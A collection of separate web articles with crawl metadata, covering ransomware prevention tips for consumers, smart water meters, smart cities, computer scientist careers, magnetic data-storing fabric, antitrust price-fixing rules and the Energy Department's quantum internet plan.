The ever-changing landscape of technology is a fascinating sight to see, but not all the players are working for good. The emergence of stunning virtual reality and helpful software also attracts hackers. Follow these steps to stay safe from ransomware attacks and defend personal information. The Goals of Ransomware The United States saw 3,728 people or organizations fall victim to ransomware attacks in 2021, with tens of millions of dollars lost. These strikes are serious cases and can cause their targets to lose large amounts of money. Ransomware’s goal is to earn a ransom from stolen information. Through a seemingly secure download, these hackers gain access to their victim’s data and then threaten them until they are paid. One such method of a ransomware attack is the locking approach. Once inside, the attacker freezes all functions on the keyboard and mouse. Next, a pop-up covers the screen, demanding money or the data will be deleted or sold to another buyer. The other method many attackers use is crypto-ransomware. The attacker will create unique keys that do not allow the owner to access them. Files will now begin to have extensions like .crypt or .encrypted. Thankfully, there are ways to prevent these attacks and build a security plan. Understanding how attackers install ransomware onto their target’s devices is vital. Phishing schemes in emails can contain links and attachments that house ransomware attacks. They are often disguised as friends or innocent senders, and their appearance tries to lull their victim into a sense of safety before striking. Besides targeted links, users should be wary of “drive-by downloads.” Frequenting insecure websites may house ransomware that automatically downloads even if the user has not clicked on anything suspicious. Steps to Protect Against Ransomware Thankfully, there are several ways to stay safe from ransomware attacks. People should take these steps to secure their data. 1. Keep Software up to Date Ransomware evolves and tries to maneuver around security measures, so users must match this with a level of precaution. Most tech enthusiasts already have security software installed on their devices. However, everyone needs update reminders so their programs can run as efficiently as possible. Additionally, consider configuring automatic scans to run at set intervals. This ensures nothing will slip through the cracks. 2. Back Data Up Security software is vital, but a proactive approach requires proper backing-up of data. Seek a cloud service that places copies of documents onto a third-party server. If the hacker compromises the original copy and home computer, the user can simply wipe the device and not worry about the attacker’s threats. The user will be confident knowing their documents are still safe on the cloud. However, be sure the backups are secure as well. Research third-party cloud sharing platforms and stay updated on their security protocols. 3. Stay on Secure Networks Though the coffee shop Wi-Fi is enticing, it may be at risk of ransomware attacks. Free, public Wi-Fi is often not as secure as home or employer networks, so it is important to only use devices with sensitive information at home or in trusted settings. A VPN can ensure a secure connection away from the home and office if there is no way around using public Wi-Fi. 4. Maintain Password Security Create long passwords that appear random. For maximum security, experts recommend using a passphrase of four unexpected yet memorable words strung together. Multifactor authentication, password keepers and security questions are also good options to maintain privacy on all accounts. 5. Click with Caution Always use caution when opening links and email attachments. Remember that ransomware attackers disguise their strikes as familiar or friendly faces to trick their targets. Even if the sender seems authentic, double-check their address to see the validity of the email. 6. Get Educated Educating oneself on proper security actions is a good practice to implement. Notifications from the Cybersecurity and Infrastructure Security Agency (CISCA) update users on new ransomware targeting practices or additional advice for protection. Business owners should consider adding ransomware training for employees as well. Knowing how to recognize a spam email or suspicious link can greatly impact company data security. What to Do if an Attack Occurs If the ransomware attacker has breached the security measures, the next steps depend on the type of device. People whose personal devices have been affected need help from an authority like the FBI. Employees on work computers should contact IT and security professionals from internal offices. After professional help has removed the ransomware, the user must change all passwords and update their security measures. Staying Safe From Ransomware Ransomware seems like a scary prospect for many people, but anyone can protect themselves from these threats with the right education and tools. Follow these steps to maximize security on all devices and build an impenetrable wall against ransomware attacks.
<urn:uuid:706502c5-59a0-4136-a2e0-adacfd95fe7b>
CC-MAIN-2022-40
https://latesthackingnews.com/2022/09/20/be-aware-6-steps-to-protect-against-ransomware/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00733.warc.gz
en
0.930937
1,009
2.65625
3
How are IoT and Smart Meters Uplifting the Water Industry? What are smart water meters? Smart water meters are pieces of advanced infrastructures that create a two-way interaction with the information management system of utilities. Hence, these meters enable customers and water suppliers to share information with each other that empower both parties to take useful and practical actions. These advanced metering infrastructures are now the need of the hour, especially in cities due to rapid urbanization and growing water scarcity from climate change. By using these meters the cities can balance supply and demand conditions in an efficient manner. How do (IoT) smart water meters work? By using modern-day information and communication technologies (ICTs) such as Internet of Things, water utilities are now managing their already limited water supply. This paradigm shift toward cutting-edge IoT solutions enables water suppliers to accomplish two major goals. First, these systems help them to reduce water losses in the entire water distribution network. As per a study by the World Bank, more than 32 billion cubic meters of water is lost every year. Most of which contributes to non-revenue water. Non-revenue water refers to the treated, sanitized, processed, and supplied water that doesn’t reach the end consumers and enables during the distribution processes. Second, these ICT powered solutions allow utilities to track and manage the demand for water. This demand management helps utilities to make the best use of existing water supplies. Subsequently, utilities can forecast the time when their water resources will run out and accordingly make plans for the future. This further empowers the conversation of water resources and help provide everyone with sufficient potable water. Role of Smart Water Meters An essential component of any IoT based water monitoring solution is its smart water meters. These meters allow utilities to regularly read readings of their customers’ meters from remote locations. This helps them to provide their customers with 24*7 fresh and drinkable water and identify water losses in the system. Currently, many cities around the world have started using automatic water meter readers (AMRs) that use a one-way communication to help utilities monitor water consumption data of end-users in real-time. Smart water meters boasts a two-way communication that facilitates a data-sharing network between the meters and the utility’s information system. These smart meters not only provide benefits associated with meter readings but also helps consumers to garner the consumption data sent back to them from their water supplier. Hence, customers can also develop their own strategies to lower their water consumption costs. Benefits of using smart water meter based IoT solutions Both for water suppliers and consumers, IoT smart water meters offer numerous benefits. Let us explore them one by one: - Benefits for utilities: - Allow leak identification - Energy reduction and saving - Demand forecasting and planning - Statistically enhanced saving water awareness campaigns - Efficient appliances promotion - Monitoring of performance indicators - Benefits for consumers: - Reduced water bills - Water consumption monitoring - Water consumption comparison against other customers - Rationing of water-based on consumption thresholds - Rationing of water-based on time of day Additionally, the automatic water metering help in analyzing socio-demographic factors and then balance supply and demand conditions. This also strengthens the water distribution network of a city and ensure its efficient management. Check our previous article to find other challenges in the water industry. Application of Smart Water Meters in Cities The Public Utilities Board (PUB) of Singapore has recently rolled out its efforts in creating a network of smart water meters. The main purpose of using these IoT driven devices is for the city to record water consumption data. By analyzing this data the city expects to build customer consumption profiles and identify consumption patterns and trends. Moreover, the city wants to share the respective profiles with their customers so that they can understand their water inefficiencies and manage its consumption properly. Singapore’s PUB also wants to use this network to establish an engagement strategy by incentivizing customers to save water. This is all a part of the PUB’s plan to evoke consumers and motivate them to conserve water and reduce tariffs. The San Francisco Public Utilities Commission (SFPUC) has also installed similar automated water meters in more than 96% of the city’s 178,000 water accounts. These meters transfer information related to the consumption of water and help utilities to use this data to bill users over a wireless network. The readings that these meters take, help utilities to identify places where every drop of the water they produced is consumed every hour in a cubic foot of water. The reliable and effective data gathered from these systems also help users to monitor the water consumed by them and detect potential leaks faster than manual methods. SFPUC has also developed a web portal for its users, where they can download the amount of water they have consumed on a daily and monthly basis and learn ways to conserve water. The commission also uses the hourly water consumption data to notify important news to the residents related to water cuts. This system is also used to alert customers about probable leaks if they have garnered non-stop water for 3 days continuously over emails, texts, or calls. Continuously growing population (especially in cities) and depleting water resources due to climate change has forced the utilities to turn towards smart meters based IoT solutions. These solutions allow utilities to ensure an efficient supply of water based on demand. They are also empowering the customers to go through their historical data about water consumption and take action to save water on a personal level. Thus customers can identify water inefficiencies in their homes and set water-saving goals to further reduce water bills. This article was written by Sanjeev Verma, the founder and CEO of Biz4Group, based out of Orlando. He has conceptualized the idea of Biz4 Brand and founded Biz4Group and Biz4Intellia. He has 20+ years of experience in boosting IT-based start-ups to success. In the past, he has worked on leadership positions with Marriott Vacations, Disney, MasterCard, Statefarm, and Oracle.
<urn:uuid:ef255a8d-b655-4db9-ac26-efbbd375ae1c>
CC-MAIN-2022-40
https://www.iiot-world.com/industrial-iot/connected-industry/how-are-iot-and-smart-meters-uplifting-the-water-industry/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00733.warc.gz
en
0.948369
1,283
3.140625
3
Downtown parking is a headache that plagues cities and drivers alike. In Halifax, street parking is at a minimum, and if you’re lucky enough to find a spot you still need to feed the meter with old-fashioned cash. Larger cities in Canada and around the world have taken the pain out of parking by automating the payment process via smartphones. In Montreal, for example, the P$ service allows customers to pay for parking via an app on their smartphone. It even sends a text reminder 15 minutes before your parking time is up, so you can top up the payment and avoid a ticket. In major metropolitan areas and smaller cities alike, governments are turning to smart technologies — cloud, high-speed optical networks, Internet of Things (IoT), software-defined networks (SDN) and network function Virtualization (NFV) — in their quest to manage strained infrastructures with limited budgets. The global market for smart cities is booming. According to industry researcher Frost and Sullivan, it’s expected to reach US$1.5 trillion by 2020. The investment signals governments’ urgency to enhance the livability of their communities, according to Dan Pitt, executive director of Open Networking Foundation. “The overarching theme for smart city projects is ‘how do we use these new technologies to benefit the lives of everyone in the community, not just the digital know-it-alls?’” As an important building block in smart cities, SDN enables a flexible infrastructure that can be dynamically programmed to serve different application types. Like the human brain’s neural pathways, SDN and NFV are essential in making the smart city and its networks connect and talk to each other in a meaningful way, explains government advisor Daniele Loffreda in a recent Network World article. “It makes the network applications portable and upgradable with software, and it allows cities of all sizes the agility and scalability to tackle the needs and trends of the future as they arise.” Traffic congestion is one of many issues governments are working to solve with smart technology. In the United Kingdom, for example, the city of Bristol is looking at how big data can be used to crack common problems such as air pollution, traffic congestion and assisted living for the elderly. It’s still early days in the smart city revolution, however, and there are lots of technical hurdles, including lack of interoperability among products. But the greater challenges, suggests Pitt, are around ownership, funding, sustainable models and the role for various stakeholders, including citizens and vendors. “Some cities are entirely based on a single vendor’s product line and they’re really expensive options. But I’ve also seen some with a lot of open solutions and a lot of opportunity for vendor competition. Bristol has done a better job than most of including a non-technical community in the development of applications and uses.” The point is, says Pitt, that IT pros in municipalities need to start thinking about what kind of applications are right for their particular residents. If not, they risk being saddled with an expensive and inflexible infrastructure that doesn’t serve the needs of the population. Worse still, he says, it might affect their competitiveness in attracting and retaining people. “People, especially the younger and more mobile population, will be more inclined to move to places that have a liveliness to them based on what they can do interacting with their fellow residents.” Graphic: Mark Glucki
<urn:uuid:0060743d-c4bc-47c5-8deb-c36edc9a8607>
CC-MAIN-2022-40
https://blog.allstream.com/building-smarter-cities-vital-for-governments/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00733.warc.gz
en
0.948579
735
2.640625
3
Computer Scientist Career Path & Training These high-level technologists are a driving force behind the advancement of modern computing. Merging deep technical acumen, creativity and scientific research skills, computer scientists invent new information systems and improve upon existing ones. Computer scientists work in a variety of industries, notably hardware and software design companies, the federal government (especially in the defense sector), IT research firms and academia. For a better idea of what computer scientists can do, here are some CS superstars and their key accomplishments: - Alan Turing – “The Father of Computer Science” formalized the concepts of "algorithm" and "computation" with his Turing Machine, and developed the British Bombe machine which helped crack Germany's Enigma code in WW2 (1936, 1939) - Grace Hopper – Invented the compiler, coined the phrase “debugging,” and created Cobol - one of the first (and still widely used) programming languages (1940s – 50s) - Shaun Fanning – Invented P2P (peer-to-peer) file sharing and brought it to the mainstream with Napster (1999) - James Gosling – Led the team that invented Java, one of today’s most prolific and powerful coding languages (1995) - Steve Jobs – Co-Founded Apple, and revolutionized the way we perceive personal and mobile computing (1976, 2007) While most computer scientists’ accomplishments aren't widely known, their valuable contribution is recognized by those in-the-know, and rewarded in kind -- the average salary for computer scientists is over $118,000, according to the latest data from the U.S. Bureau of Labor Statistics. For the truly gifted in this field the sky’s the limit. Technical training providers and accredited universities offer a range programs to prepare you for the computer scientist career path. Compare the top-reviewed computer science programs online and in your area below. a.k.a. Computer Information Research Scientist | Computer and Information Scientist Computer Scientist Salary Training and Degrees Computer Science Jobs Computer Scientist Job Outlook Frequently Asked Questions Computer Scientist Skills & Responsibilities Computer scientists employ a range of technical skills and soft skills to successfully execute this position. Here are some typical day-to-day activities and marketable skill sets for this job role. Computer scientists: - Identify and solve complex technology problems in business, medicine and other essential industries. - Apply and adapt theoretical principles to develop new computer software and/or hardware solutions. - Are well-versed in CS-related math skills, e.g., linear algebra, calculus, statistics & discrete mathematics. - Must possess world-class soft skills in complex problem-solving, communication and creative thinking. - Consult with end-users, managers and vendors to determine computing goals and system requirements. - May work closely with computer engineers and natural scientists to solve complex computing problems. - Utilize superior technical writing skills to document and publish their most significant CS findings. - May supplement their income with [or focus solely on] CS teaching gigs across all levels of academia. - Not all computer scientists are coders, but those who are should be fluent in the day’s leading programming languages, such as Java, C++ and Python. Computer Scientist Salary The median annual salary for computer scientists is $127,000, according to the latest data from the U.S. Bureau of Labor Statistics. Average salaries for computer scientists and related IT career paths: - Systems Analyst: 79,000 - Software Engineer: $90,000 - Hardware Engineer: $92,000 - UI/UX Designer: $94,000 - Research Statistician: $101,000 - Machine Learning Scientist: $103,000 - Principal Research Scientist: $107,000 - Big Data Scientist: $119,000 - Computer Scientist: $127,000 Highest paying U.S. cities for computer scientists: - San Jose, CA / Silicon Valley: $171,000 - San Francisco / Oakland, CA: $163,000 - Portland, OR: $150,000 - Seattle, WA: $147,000 - DC Metropolitan Area: $146,000 - Phoenix, AZ: $146,000 Most computer scientists work in full-time salaried positions. For those who work on a part-time or contract basis, the mean hourly wage for computer scientists is about $50, with most falling in the range of $27 to $64 per hour, depending on geographic location, experience, skill set, publications and body of work. Sources: U.S. Dept. of Labor, Bureau of Labor Statistics | Indeed.com Computer Scientist Education Requirements Computer scientist positions in business and academia typically require a graduate degree - such as a Master’s or Ph.D. - in computer science (CS), systems analysis, computer information systems (CIS) or a similar field of study. However, in the federal government and military, many entry-level computer science jobs can be achieved with a bachelor’s degree, providing you pass the requisite security/background checks – which can be rigorous depending on the agency and role you’re applying to. Marketable skills to look for in a computer scientist degree program include software development and programming, computer hardware engineering, data analysis, information systems management, technical training, technical writing, and advanced mathematics – particularly linear algebra, statistics, calculus and discrete mathematics. Sought-after soft skills for computer scientists include creative thinking, complex problem solving, time management, and effective interpersonal communication – both written and verbal. Compare training and degree programs that align with computer scientists’ education requirements Computer Science Degree Programs Browse accredited degrees, vocational certificates, and online courses matching the computer scientist career track. Bachelor of Science in Computer Science: Software Engineering - Gain the Expertise to Pursue Sought-After Roles in Web and Mobile Application Development - Full Stack Software Design and Engineering - Build Systems Architectures to Meet Business Needs - Design UIs for Embedded, Cloud & Mobile Systems - Analyze and Design Data Structures & Algorithms - Cybersecurity Tools & Techniques ft. Secure Coding Associate of Applied Science in IT: Programming & Software Development - Develop Software for Web and Mobile Devices - Graphic Design Training ft. Adobe's Creative Suite - User-Interface and User-Experience Design - Software Product Development using Agile Bachelor of Science in Software Development - Cross-Platform Application Development Training - User Interface (UI) & User Experience (UX) Design - Software Testing, Security and Quality Assurance - Advanced Data Modeling and Database Development - Manage Software Projects with Agile Best Practices - Transfer Previous College Credit to Lower Tuition Master's in Technology Management - Prepare to Lead Personnel and Use Emerging Technologies to Achieve Organizational Goals - Choose from courses such as: - Business Intelligence and Data Analytics - Cyber Security Threats & Vulnerabilities - Managing Diverse Organizations in a Flat World - Cloud Computing and Virtualization - Cryptography & Network Security - Computer Systems Analysis - No GRE or GMAT Required for Admission Computer Scientist Jobs Your computer science training and experience may qualify you for a range of job roles, including: - Data Scientist jobs - Computer Systems Analyst jobs - Software Developer jobs - Hardware Engineer jobs - Research Analyst jobs - Data Analyst jobs - Computer Science Instructor jobs - More Computer Science job openings Computer Scientist Job Outlook The U.S. Bureau of Labor Statistics projects 22% growth in the computer scientist job market from 2020 to 2030, much faster than the 8% average for all occupations over this period. Computer scientists are charged with advancing and innovating all aspects of technology, thus as technology continues to play a larger role in how we live and work, the job outlook for computer scientists will continue to be bright. To improve your chances of getting hired for a lucrative computer science position, bolster your learning plan with training in software development, currently the fastest-growing and most sought-after skills domain in the IT workforce. Complimenting your curriculum with coursework in hot and emerging areas like robotics, big data analysis, artificial intelligence and cyber security will further boost your computer scientist job prospects. Source: U.S. Bureau of Labor Statistics Frequently Asked Questions Tech insiders answer common questions from prospective computer scientists. How much do computer scientists make? The median salary for computer scientists is $126,830, according to the US Bureau of Labor Statistics. This is much higher than the median wage for all occupations in America which is $41,950. How long does it take to become a computer scientist? Most computer scientist positions require a master ‘s degree or higher, so it typically takes 6 years of education to become a computer scientist (4 for bachelor’s + 2 for master’s). Some schools offer computer fast track computer science degrees where students can simultaneously earn their CS bachelor’s and CS masters in 4.5 to 5 years. What percentage of computer scientists are female? 20 percent of computer scientists are female, according to the US Bureau of Labor Statistics.
<urn:uuid:949ea659-0fce-4d37-bb34-4de4ca16f279>
CC-MAIN-2022-40
https://www.itcareerfinder.com/it-careers/computer-scientist.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00733.warc.gz
en
0.886756
1,971
3.203125
3
The computer scientists at University of Washington developed new type of smart fabric it can store security codes and identification tags. The UIST 2017, previously unexplored magnetic properties of conductive thread. The data read using smartphones, an existing instrument in smartphone that enables navigation apps. This is a completely electronic-free design, which means you can iron the smart fabric or put it in the washer and dryer, said senior author Shyam Gollakota, associate professor in the Paul G. Allen School of Computer Science & Engineering. You can think of the fabric as a hard disk you’re actually doing this data storage on the clothes you’re wearing. The embroidery thread that can carry an electrical current as conductive thread used by people. But off-the-shelf conductive thread also has magnetic properties. Manipulated to store either digital data or visual information like letters or numbers. Moreover, the device used to read data known as magnetometer. It measures strength of magnetic fields and directions embedded in smartphones. We are using something that already exists on a smartphone and uses almost no power, so the cost of reading this type of data is negligible, said Gollakota. Researchers stored the password to an electronic door lock on conductive fabric patch sewn to shirt cuff. They unlocked the door by waving the cuff in front of an array of magnetometers. The researchers align the poles in either a positive or negative direction. Relatively to 1s and 0s in digital data. They used conventional sewing machines to embroider fabric with off-the-shelf conductive thread. Magnetic poles where start out in a random order. By rubbing a magnet against the fabric. The fabric re-magnetized and re-programmed multiple times. The data in fabric patch maintains its data after ironing, machine washing. The team demonstrated magnetized fabric used to interact with a smartphone while it is in one’s pocket. Also developed glove with conductive fabric sewn into its fingertips. To gesture at the smartphone, each gesture possess different magnetic signal performs specific actions like pausing or playing music. “With this system, we can easily interact with smart devices without having to constantly take it out of our pockets,” said lead author Justin Chan, an Allen School doctoral student. However, the phone recognized six gestures left, right, upward, downward, click and back click. Future work is focused on developing custom textiles. To generate stronger magnetic fields and are capable of storing a higher density of data.
<urn:uuid:3945d161-0b9d-439d-a43b-1224d697df11>
CC-MAIN-2022-40
https://areflect.com/2017/11/01/information-stored-invisibly-in-fabric/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00733.warc.gz
en
0.907624
523
3.046875
3
Here's how to avoid the “red lights” and navigate the “yellow lights” of antitrust law. In the first column in this series, we discussed how antitrust laws are the traffic lights for business. The focus of this column is the most important antitrust “red light” – horizontal price fixing – and several business practices that, while common, are actually “yellow lights” that can lead to significant antitrust risk if not undertaken with care. What is Horizontal Price-Fixing? Horizontal price-fixing occurs when two or more competitors conspire to set prices, price levels, or price-related terms for their goods or services. With very limited exceptions, price-fixing is per se illegal, regardless of its reasonableness or actual effect on competition. As a result, price-fixing is serious business. The fines and criminal sentences discussed in the first column of this series all arise from Department of Justice investigations into price-fixing. Beware. Agreements among competitors may constitute price-fixing even where they do not involve the ultimate price of a product. Examples of unlawful price-fixing arrangements include agreements between competitors on: - A method of quoting prices. - Uniform or standard trade-in allowances. - Price differentials between grades of production. - Percentage of functional discounts. - Price or feature advertising. - Excluding a low price competitor from a trade show. - Shipping or credit terms. Other types of agreements, such as those that interfere with competitive bidding or seek to control production, also have an effect on price and can raise serious antitrust concerns. Price-fixing has been per se illegal as long as there have been antitrust laws. Thus, most price-fixing is not accomplished by express agreement, and direct evidence of collusion is rare (although there are some astonishing exceptions). Generally, collusion is accomplished subtly and is, therefore, proven by inference from otherwise common business practices involving communications and cooperation between competitors. That makes it important to be aware of what common practices create that risk, and how to lawfully engage in them to minimize risk. Exchanging Information with Competitors As a general rule, while not illegal per se, it is best never to discuss prices, costs, production, purchase terms, territories, or customers with competitors. While courts recognize that the exchange of price information can in some cases increase economic efficiency and make markets more, rather than less, competitive, direct price exchanges are routinely deemed evidence of a scheme that violates the antitrust laws. Price data is best shared by competitors, if at all, only indirectly and in ways that make the information disseminated to competitors cumulative and generic. Even where the information exchange is done carefully and with the best of intentions, the most important factor in determining whether the law has been violated is whether there is a demonstrable anti-competitive price effect. Although the exchange of cost information is less problematic from an antitrust perspective, the same cautions apply. Care should also be taken in exchanging credit, production, and other confidential business information because each can, and does, affect the ultimate price of a product. The greatest danger that arises from the exchange of sensitive information among competitors is that it creates one more fact from which a jury may be allowed to infer a per se illegal price-fixing conspiracy. It is not difficult to imagine a jury finding that a conspiracy exists where competitors exchange price lists and their respective prices subsequently rise to the same level, even if the pricing was purely coincidental and innocent. Gathering of Competitor Information Companies certainly may and do seek information about their competitors, but they should do so from a source other than the competitor. For example, a company could legitimately obtain a competitor’s price list from a distributor or from a public bid document. Because of the inferences that can be drawn from the use of that information, however, any employee receiving a competitive price list should contemporaneously document in writing when, where, how, and from whom the price list was received. That will help ensure that, if the company faces an antitrust suit years later, the company can prove it received the list from someone other than a competitor. As information becomes increasingly available on the web pages of competitors, a company may also find useful information there, subject to appropriate documentation of the public source. It is also common for trade associations to collect information in the form of sales and production data from individual members, aggregate that data, and disseminate it to the association’s membership. This, too, is generally permissible; provided that the trade association takes care to assure that the information is sufficiently aggregated so that the association is not merely acting as a conduit between competitors to exchange sensitive information. Where, however, the relevant market is concentrated, even an exchange of public information may be considered create the inference of an agreement among members of the association to curtail production and raise prices by signaling planned behavior. Thus, where a concentrated market exists, it is prudent not only to avoid price information exchanges with competitors, but to consult legal counsel before participating in, or responding to, any trade association activities or industry analyst’s survey or request for price information, including discounts, rebates, shipping and credit terms. Joint Purchasing & Other Competitor Collaboration Arrangements Joint purchasing agreements can be lawful because their effects can be pro-competitive. Because of the prevalence of such arrangements, as well as other competitor collaborations for joint research and development, production, marketing, distribution, and sales, the Federal Trade Commission and the U.S. Department of Justice adopted formal Antitrust Guidelines for Collaborations Among Competitors in April 2000. These guidelines and subsequent interpretations by both agencies provide an analytical framework and specific “safe harbors” based on factors like market share, market concentration, and the scope and length of the collaboration, all of which help assess whether the proposed joint activity is more or less likely to achieve efficiencies that will benefit consumers. In general, the higher the market share of the competitors individually, or as a proposed group, the stricter the scrutiny that will be applied, but any business contemplating a collaborative effort with one or more of its competitors should review the Guidelines carefully. Other Non-Price-Related Agreements Some common horizontal agreements do not involve price, but are nonetheless often deemed anti-competitive and therefore illegal. Perhaps the most familiar are concerted refusals to deal or group boycotts—arrangements in which those at the same horizontal level of the market agree not to deal with competitors, customers or suppliers. The intent of the boycott is to disadvantage competitors and it is often accomplished by cutting off a competitor’s access to a necessary supply, facility or market, either by direct denial, or through other coercion. These concerted refusals to deal are often the subject of private antitrust suits (and treble damages claims) and complaints to antitrust regulatory authorities. They also present the highest risk that a manufacturer will join a horizontal conspiracy among its distributors and find its otherwise legitimate business plans deemed per se illegal. Even a series of purportedly vertical relationships between a dealer and its various suppliers that results in the suppliers boycotting the dealer’s competitors may violate the antitrust laws. To avoid this potential risk, suppliers and dealers need to follow some simple rules: - Suppliers should never agree with competitors to refuse to sell products to common dealers or customers. - A supplier should never agree with a group of its customers or dealers not to deal with some other dealer or customer. - Competing dealers must remember that the antitrust laws view them as competitors and view any horizontal agreement between them harshly. - Aggrieved dealers should complain directly to the supplier without involving other dealers, and the supplier should do no more than listen politely, taking action, if any, unilaterally without involving the complaining dealer further, much less agreeing on a course of action. Horizontal agreements to divide markets or allocate customers are also per se unlawful, and run a close second to price-fixing schemes in number of agreements condemned. Bid rigging, for example, is considered an agreement to allocate customers and has resulted in jail terms for participants. Market divisions among potential, as well as actual competitors, are also unlawful. Customer allocations and territory divisions by and among competitors are generally condemned because they are indirect forms of production or output restrictions. For example, exclusive distributorship agreements between competitors that restrict one party from competing in the market of another party may constitute a horizontal allocation that denies consumers in both markets the benefits of competition on price and quality. In contrast, courts have recognized that some products could not be offered without limited cooperation between competitors. For example, professional sports leagues could not produce games without agreements on schedules, rules, and certain splits of gate receipts. In these situations, where horizontal market and customer allocations are ancillary to an integration of economic activities by the parties and where those integrated economic activities are actually pro-competitive, courts have judged the actions under the rule of reason. Covenants not to compete are analyzed under the rule of reason. Covenants not to compete have many business and legal implications, but in the antitrust context are usually examined for reasonableness with regard to time, territory, and type of product. Plaintiffs bear a heavy burden to prove that a covenant not to compete violates the Sherman Act when the covenants arise as part of a legitimate business transaction. To be lawful, restrictive covenants need only be: - Ancillary to the main purpose of the lawful contract. - Neither imposed by a party with monopolistic power, nor in furtherance of a monopoly. - Partial in nature and reasonably limited in time and scope. - No greater than necessary to afford fair protection to the parties, and not so extensive as to interfere with the interest of the public. To succeed on a claim for a § 1 violation based on a covenant not to compete, a defendant must have knowingly enforced an invalid non-competition agreement and the plaintiff must show an adverse impact on competition in the relevant market stemming from enforcement of the provision, either through direct evidence (for instance, showing a decrease in supply) or a more elaborate showing of adverse effects on competition without pro-competitive justification. Thus, as a general rule, unless a covenant not to compete amounts to an allocation of customers or markets, they survive antitrust challenge. In short, while competitor collaborations can occur on a number of levels, and often have significant, beneficial effects on the market, they can also have precisely the opposite effect. As a rule of thumb, it is always prudent to start with the assumption that any collaboration among competitors is a yellow light, and potentially a red light in practice if not policy, more than justifying advance consultation with the legal department before moving forward. For more information, read Pricing Issues And Antitrust Law . Roberta F. Howell is a partner at Foley & Lardner LLP in Madison, Wis. She is co-chair of the firm’s Distribution and Franchise Practice.
<urn:uuid:cecbc802-8f7d-4266-a9de-cf68e3f968d1>
CC-MAIN-2022-40
https://www.mbtmag.com/quality-control/article/13216091/price-fixing-and-other-horizontal-agreements
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00133.warc.gz
en
0.94107
2,262
2.90625
3
Impacts could be realized within the next decade. The Energy Department on Thursday released a strategic blueprint to construct a potentially “unhackable” nationwide quantum internet. The plan to develop a prototype that relies on quantum mechanics to connect next-generation computers and sensors and underpin securely transmitted communications is the result of a workshop held by Energy in New York City in February. There, around 70 stakeholders from across sectors united to confront engineering and design barriers, pinpoint research needed and puzzle out how to transform existing, local network experiments to a viable ‘second’ internet. Energy’s 17 national laboratories will serve as the backbone of the system, according to the agency, which confirmed that the desired outcome could be fully realized within the next decade. “This is one of the most important technology innovations of the 21st century,” Argonne National Lab Director Paul Kearns said during a news conference unveiling the announcement in Chicago Thursday. “It'll lead the way to many remarkable benefits for society at large.” The quantum landscape is rife with complexities, but to help attendees better grasp the endeavor, David Awschalom, a senior scientist at Argonne and professor at the University of Chicago’s Pritzker School of Molecular Engineering, explained during the event that nature “behaves very differently”—namely, it follows the world of quantum physics—at the atomic scale. “In this quantum world, particles can exist in multiple states at the same time, like on and off but simultaneously. And they can be entangled, that is, they can share information with one another—even over very long distances and even without a physical connection,” he explained. “So while this special world is invisible to us, a quantum internet is going to harness these strange properties to build new types of devices with powerful applications and communication, national security, finance and medicine.” Moves to produce the quantum internet are already making progress in the Chicago region—as Energy puts it, Argonne scientists in Lemont, Illinois, and the University of Chicago in February “entangled photons across a 52-mile ‘quantum loop’ in the Chicago suburbs, successfully establishing one of the longest land-based quantum networks in the nation.” Now in this new streamlined effort, the network produced will connect to Energy’s Fermilab in Batavia, Illinois, to create “a three-node, 80-mile testbed.” “The combined intellectual and technological leadership of the University of Chicago, Argonne, and Fermilab has given Chicago a central role in the global competition to develop quantum information technologies,” Robert Zimmer, president of the University of Chicago, said in a statement. “This work entails defining and building entirely new fields of study, and with them, new frontiers for technological applications that can improve the quality of life for many around the world and support the long-term competitiveness of our city, state, and nation.” Scientists from Stony Brook University and Brookhaven National Laboratory also recently produced an 80-mile quantum network testbed, which they are actively expanding. But America isn’t the first to engage in such a monumental pursuit. A key U.S. technology competitor—China—which has invested in quantum information science for years, “has been breaking distance records for quantum networks,” the new strategy notes. Europe also previously launched the Quantum Internet Alliance to craft the first blueprint for a quantum internet. The U.S.’ strategy explores various hardware and software components that must be developed for the plan to come in fruition and details how the networks should be built over time. It includes four priority research directions and five key roadmap milestones that it says “must be achieved to facilitate an eventual national quantum internet.” According to Energy, the to-be-developed networks could be “virtually unhackable,” as it’s exceedingly difficult to intrude on quantum transmissions. “One of the interesting aspects of quantum data is the act of looking at it changes it,” University of Chicago’s Awschalom explained. “So this means if we use a quantum network to send or receive information, and someone tries to eavesdrop, they'll destroy the message. It’s quantum secure.” As Awschalom previously alluded to, those in health, banking and airline industries, as well as national security-focused insiders are likely to be the earliest adopters, but the agency also predicts that “eventually, the use of quantum networking technology in mobile phones could have broad impacts on the lives of individuals around the world.” Energy’s Undersecretary for Science Paul Dabbar echoed a Henry Ford quote in reference to potential applications, during the announcement. “If I would have asked customers what they wanted, they would have told me ‘a faster horse.’ People don't know what they want until you show it to them,” he said, adding “and that is what we are beginning today.” In a press call following the unveiling, Dabbar and other officials stopped short of confirming or elaborating on the ultimate cost and funding channels for the ambitious endeavor. President Trump’s budget request for 2021, nevertheless, includes $25 million specifically intended for Energy’s Office of Science “to support early stage research for a quantum internet.” JD Dulny, a chief scientist leading Booz Allen Hamilton’s quantum computing research team told Nextgov Friday that insiders at the firm are “excited to see this next step for U.S. quantum information sciences.” “Quantum advancements are changing the ways we use computing, communications, and sensing technologies today,” Dulny said. “A well-developed ‘quantum internet’ of the future will bring the benefits of increased security and increased computational power to a broader audience, and provide next-generation distributed precision sensing capabilities.”
<urn:uuid:5b759e9c-eebc-46e1-a4c6-62f487da88e7>
CC-MAIN-2022-40
https://www.nextgov.com/emerging-tech/2020/07/energy-unveils-blueprint-nationwide-unhackable-quantum-internet/167199/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00133.warc.gz
en
0.927608
1,264
3.046875
3
